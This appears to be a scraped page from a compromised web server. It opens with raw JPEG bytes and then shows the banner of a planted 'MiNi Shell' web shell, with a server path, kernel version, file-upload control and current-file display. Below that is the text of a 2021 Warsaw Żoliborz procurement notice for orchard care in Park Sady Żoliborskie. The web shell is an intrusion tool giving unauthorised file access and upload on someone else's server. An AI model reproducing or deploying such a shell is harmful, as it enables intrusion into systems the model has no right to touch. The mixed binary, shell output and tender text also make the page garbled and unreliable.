JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210527/0006592701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00065927 z dnia 2021-05-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie prac związanych z realizacją projektu budżetu obywatelskiego pn. „Owocowe Sady Żoliborskie – kompleksowe działania na rzecz zachowania unikalnego charakteru Parku Sady Żoliborskie z drzewami </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa, Dzielnica Żoliborz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01525966300186</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 6/8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-627</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">224438869</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">Zoliborz.WZP@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zoliborz.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie prac związanych z realizacją projektu budżetu obywatelskiego pn. „Owocowe Sady Żoliborskie – kompleksowe działania na rzecz zachowania unikalnego charakteru Parku Sady Żoliborskie z drzewami </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0448acfa-bd35-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00065927</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001288/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wykonanie usług ogrodniczych związanych z realizacją projektu budżetu obywatelskiego pn. Owocowe Sady Żoliborskie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja Zamawiającego z Wykonawcami odbywa się za pomocą środków komunikacji elektronicznej<br/>z wykorzystaniem Systemu Zakupowego Miasta Stołecznego Warszawy. Korzystanie z Systemu przez<br/>Wykonawców jest bezpłatne.1) Aby złożyć ofertę w postępowaniu Wykonawca jest zobowiązany do<br/>dokonania rejestracji w Systemie Zakupowym Miasta Stołecznego Warszawy dostępnym pod adresem:<br/>https://zamowienia.um.warszawa.plSystem Zakupowy Miasta Stołecznego Warszawy jest zintegrowany z<br/>platformą OnePlace Operatora Systemu. Zamawiający informuje, że przy pierwszym logowaniu się<br/>Wykonawców do Sytemu, konieczne jest przejście przez ścieżkę rejestracji do strefy dostawców<br/>OnePlace. Rejestracja Wykonawcy w Systemie następuje automatycznie poprzez weryfikację adresu email<br/>podanego przez Wykonawcę w formularzu rejestracyjnym. Zamawiający zaleca dokonanie rejestracji<br/>bez zbędnej zwłoki ponieważ proces weryfikacji Wykonawcy może potrwać do 2 dni roboczych.2)<br/>Szczegółowe informacje dotyczące sposobu rejestracji i logowania do Systemu, znajdują się Instrukcjach<br/>dla Wykonawcy na stronie internetowej prowadzonego postępowania w zakładce „Regulacje i procedury<br/>procesu zakupowego” pod adresem: https://zamowienia.um.warszawa.pl/servlet/HomeServlet?<br/>MP_module=main&MP_action=publicFilesList&clientName=umw&USER_MENU_HOVER=publicFilesList3)<br/>Po zarejestrowaniu i zalogowaniu się do Systemu Wykonawca uzyska dostęp do aplikacji umożliwiającej<br/>składanie wniosków, ofert i zadawanie pytań w postępowaniu. Komunikacja pomiędzy Wykonawcami a<br/>Zamawiającym będzie odbywała się za pomocą funkcjonalności Systemu. System umożliwia między<br/>innymi dokonywanie czynności złożenia oferty, wycofania oferty , złożenia pytań itd. 4) Za datę złożenia<br/>oferty, wniosków, zawiadomienia, dokumentu elektronicznego, oświadczenia lub elektronicznej kopii<br/>dokumentu lub oświadczenia, przyjmuje się datę przekazania (złożenia) w Systemie Zakupowym Miasta<br/>Stołecznego Warszawy do Zamawiającego. Moment złożenia oferty następuje wraz z zakończeniem<br/>procesu składania, tj. po kliknięciu przycisku „Złóż wniosek”/”Złóż ofertę”, elektronicznym podpisaniu<br/>formularza wniosku/oferty i wyświetleniu przez system komunikatu „Oferta złożona poprawnie”. W sekcji<br/>„Podsumowanie” na formularzu ofertowym wyświetli się dokładna data i godzina złożenia wniosku/oferty w polu „Data”.5) Kodowanie i czas odbioru danych:a) plik załączony i zapisany przez Wykonawcę, widoczny<br/>jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;b) oznaczenie czasu<br/>odbioru danych przez System stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.6)<br/>Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy:a) stały dostęp<br/>do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;b) komputer<br/>PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;c) zainstalowana<br/>przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;d)<br/>zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.Szczegółowe informacje<br/>wskazane są w Instrukcjach dla Wykonawcy dostępnych na stronie internetowej prowadzonego<br/>postępowania w zakładce „Regulacje i procedury procesu zakupowego” pod adresem:<br/>https://zamowienia.um.warszawa.pl/servlet/HomeServlet?<br/>MP_module=main&MP_action=publicFilesList&clientName=umw&USER_MENU_HOVER=publicFilesList7)<br/>Instrukcje dla Wykonawców, dotyczące składania ofert/wniosków, składania dokumentów elektronicznych,<br/>oświadczeń, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich<br/>użyciu Systemu, znajdują na stronie internetowej prowadzonego postępowania w zakładce „Regulacje i<br/>procedury procesu zakupowego”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że w związku ze stosowaniem<br/>procedury przeprowadzenia postępowania o udzielenie zamówienia publicznego przetwarza dane<br/>osobowe przekazane przez Wykonawców ubiegających się o udzielenie zamówienia publicznego. 2.<br/>Dane osobowe, które znalazły się w posiadaniu Zamawiającego w wyniku prowadzenia postępowania są<br/>przetwarzane w celu wykonania czynności związanych z przeprowadzeniem postępowania, realizacją<br/>umowy o udzielenie zamówienia publicznego oraz realizacją obowiązków ustawowych określonych w<br/>obowiązujących przepisach prawa.3. Wykonawca ubiegający się o udzielenie zamówienia publicznego<br/>będzie zobowiązany do przekazania Zamawiającemu danych osobowych osób, które zostaną wskazane<br/>do wykonania czynności związanych z realizacją umowy oraz danych kontaktowych umożliwiających<br/>wypełnienie przez Zamawiającego obowiązku informacyjnego, o którym mowa w art. 13 ust. 1 i 2<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016, str. 1),<br/>dalej „RODO”.4. Klauzula informacyjna dotycząca przetwarzania danych osobowych, stanowi załącznik nr<br/>7 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Z uwagi na regulacje ustawy Pzp oraz cel gromadzenia<br/>iprzetwarzania danych osobowych nie przysługuje Pani/Panu: a) prawo do przenoszenia<br/>danychosobowych o którym mowa w art. 20 RODO; b) prawo do usunięcia danych osobowych, w związku<br/>z art.17 ust. 3 lit. b, d lub e RODO; c) prawo sprzeciwu, wobec przetwarzania danych osobowych na<br/>podstawieart. 21 RODO, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust. 1 lit. cRODO. Na podstawie art. 19 ust. 4 ustawy Pzp informuję, że: a) skorzystanie przez osobę<br/>,której daneosobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>RODO, niemoże skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą<br/>postanowień umowyw sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp; b) w<br/>postępowaniu oudzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w<br/>art. 18 ust. 1RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-XVIII-WZP.271.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 691260,16 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 277777,78 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie prac związanych z realizacją projektu budżetu obywatelskiego pn. „Owocowe Sady Żoliborskie – kompleksowe działania na rzecz zachowania unikalnego charakteru Parku Sady Żoliborskie z drzewami sadowniczymi, w tym m.in. pielęgnacja i zabiegi sanitarne drzew oraz koncepcja przyszłych nasadzeń roślinności”, w Dzielnicy Żoliborz m.st. Warszawy.<br/><br/>I. Ogólny opis przedmiotu zamówienia i etapy realizacji prac.<br/><br/>Przedmiotem zamówienia jest:<br/><br/>Etap I. Realizacja prac w terminie 110 dni od dnia podpisania umowy - opracowanie i przekazanie dokumentacji wraz z wymaganymi uzgodnieniami, pozwoleniami, zatwierdzeniami, itp., niezbędnymi do realizacji przedmiotu umowy (czyli II etapu zamówienia).<br/><br/>Zakres prac:<br/>1.	Stworzenie przez osoby z dziedziny architektury krajobrazu, pomologii, dendrologii (lub dodatkowo innych specjalistów wg potrzeb, np. z zakresu: ogrodnictwa, sadownictwa, ochrony środowiska, botaniki, ornitologii, biologii, ekologii, itp.), długofalowej strategii urządzenia Parku Sady Żoliborskie uwzględniającej zachowanie unikatowej, sadowniczej formuły parku, wskazującej kierunek rozwoju parku przyjazny faunie i mieszkańcom, obejmującej:<br/><br/>a)	wykonanie inwentaryzacji określającej nazwę gatunkową i odmianę wszystkich drzew rosnących w parku,<br/>b)	określenie wytycznych w zakresie wymagań i fachowej pielęgnacji drzewostanu oraz rekomendacji ws. dalszego postępowania z drzewami owocowymi sadowniczymi (w tym roku i w kolejnych latach),<br/>c)	opracowanie koncepcji tegorocznych nasadzeń drzew, jak również przyszłych nasadzeń drzew/ krzewów uwzględniającej zachowanie owocowej formuły parku oraz potrzeby zwierząt bytujących w parku (pokarm, schronienie, warunki przyjaznego bytowania),<br/>d)	opracowanie koncepcji zagospodarowania terenu zieloną infrastrukturą chroniącą faunę żyjącą w parku.<br/><br/>2.	Opracowanie dokumentacji wykonawczej w zakresie budowy i montażu elementów małej architektury, o których mowa w treści Etapu II).<br/><br/>Etap II. Realizacja prac w terminie 145 dni od dnia podpisania umowy.<br/><br/>Zakres prac:<br/>1.	Przeprowadzenie właściwej pielęgnacji wszystkich drzew owocowych sadowniczych, zgodnie z wytycznymi strategii urządzania Parku Sady Żoliborskie (Etap I, pkt 1b) i zaangażowanie do tego specjalisty/ów sadownika i/ lub pomologa, dendrologa oraz osób doświadczonych w zabiegach pielęgnacyjno-sanitarnych starych odmian drzew sadowniczych, którzy będąc wyposażeni w odpowiedni do tego sprzęt, dokonają cięć sanitarno-odmładzających pod kontrolą i wg wskazówek specjalisty/ów.<br/><br/>2.	Wykonanie nasadzeń 40 sztuk drzew w miejscach zgodnych z opracowaną koncepcją przyszłych nasadzeń w strategii urządzenia Parku Sady Żoliborskie (Etap I, pkt 1c).<br/>3.	Wykonanie zielonej infrastruktury, w tym małej architektury oraz prac ogrodniczych chroniącej faunę żyjącą w parku, na podstawie opracowanej koncepcji zagospodarowania terenu w strategii urządzenia Parku Sady Żoliborskie (Etap I, pkt 1d), w tym montaż tabliczek informacyjno-edukacyjnych:<br/>•	trzech jednorodnych stref kwietnych z roślin cebulkowych (min. 1500 szt., m.in.: krokusy, tulipany, cybulica syberyjska - propozycja lokalizacji przez ekspertów zaangażowanych w tworzenie strategii urządzenia parku;<br/>•	muraw pod drzewami (niekoszonych trawników) – pozostawienie niekoszonych trawników w formie koła o promieniu 1,5 m (dot. ok. 200 sztuk historycznych, najstarszych i najrzadszych odmian drzew sadowniczych - propozycja lokalizacji przez ekspertów zaangażowanych w tworzenie strategii urządzenia parku);<br/>•	domków dla owadów (mocowanych na drzewach) - 20 sztuk; schronień dla fauny (m.in.: dla jeży, wiewiórek z oznakowaniem informującym o schronieniu dla jeży, wiewórek) - 10 szt. (propozycja lokalizacji przez ekspertów zaangażowanych w tworzenie strategii urządzenia parku);<br/>•	wieży dla jerzyków typu „jerzykownik” wraz z tablicą informacyjno-edukacyjną z logo budżetu obywatelskiego – 1 szt. (propozycja lokalizacji przez ekspertów zaangażowanych w tworzenie strategii urządzenia parku);<br/>•	oznakowania przez specjalistę/ów sadownika, pomologa historycznych najstarszych i najrzadszych odmian drzew owocowych sadowniczych rosnących w parku (100 sztuk), w formie tabliczki umieszczonej przy drzewie z logo budżetu obywatelskiego, na której zostaną zawarte informacje określające nazwę gatunkową i odmianę drzew, wiek oraz pochodzenie historyczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111290-7 - Roboty przygotowawcze do świadczenia usług</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45223800-4 - Montaż i wznoszenie gotowych konstrukcji</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71313000-5 - Usługi doradcze w zakresie środowiska naturalnego</p> <p class="mb-0">77211500-7 - Usługi pielęgnacji drzew</p> <p class="mb-0">77211600-8 - Sadzenie drzew</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">145 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Spośród ofert niepodlegających odrzuceniu, Zamawiający wybierze najkorzystniejszą ofertę kierując się kryteriami:<br/>1)	„Doświadczenie Architekta krajobrazu” – waga 50 % to jest 50 pkt<br/>2)	„Cena brutto” – waga 40 % to jest 40 pkt<br/>3)	„Okres gwarancji jakości i rękojmi za wady na nasadzenia drzew” – waga 10 % to jest 10 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Architekta krajobrazu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi za wady na nasadzenia drzew</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust.1 ustawy Pzp;<br/>2)	spełniają warunki udziału w postępowaniu określone w ust. 2.<br/>2.	O udzielenie zamówienia może ubiegać się Wykonawca, który spełni warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej, tj. w odniesieniu do niezbędnego wykształcenia, kwalifikacji zawodowych i doświadczenia osób skierowanych przez Wykonawcę do realizacji zamówienia – wykaże, że dysponuje, co najmniej:<br/>1)	jedną osobą (projektantem), która posiada:<br/>a)	uprawnienia budowlane do projektowania bez ograniczeń lub w ograniczonym zakresie w specjalności konstrukcyjno-budowlanej,<br/>b)	co najmniej dwuletnie doświadczenie zawodowe w zakresie projektowania w specjalności konstrukcyjno-budowlanej,<br/>2)	jedną osobą (architektem krajobrazu), która posiada:<br/>a)	wykształcenie wyższe na kierunku architektury krajobrazu,<br/>b)	co najmniej dwuletnie doświadczenie zawodowe w zakresie projektowania zieleni i kształtowania przestrzeni miejskiej,<br/>3)	jedną osobą (pomologiem lub sadownikiem), która posiada:<br/>a)	wykształcenie wyższe lub branżowe (zawodowe) w dziedzinie pomologii i/ lub sadownictwa,<br/>b)	co najmniej dwuletnie doświadczenie zawodowe w zakresie uprawy drzew owocowych (sadowniczych),<br/>Zamawiający uzna także warunek za spełniony, jeżeli Wykonawca przedstawi osobę/-y, która/-e w odniesieniu do niezbędnego wykształcenia, kwalifikacji zawodowych i doświadczenia, posiada/-ją więcej niż jedną z wymienionych wyżej kwalifikacji pozwalających na pełnienie wyznaczonej funkcji w zespole.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców wystarczy, że Wykonawcy spełnią warunek dotyczący zdolności technicznej lub zawodowej wspólnie - z zastrzeżeniem, że warunek odnoszący się do doświadczenia spełni ten z Wykonawców, który wykona usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span 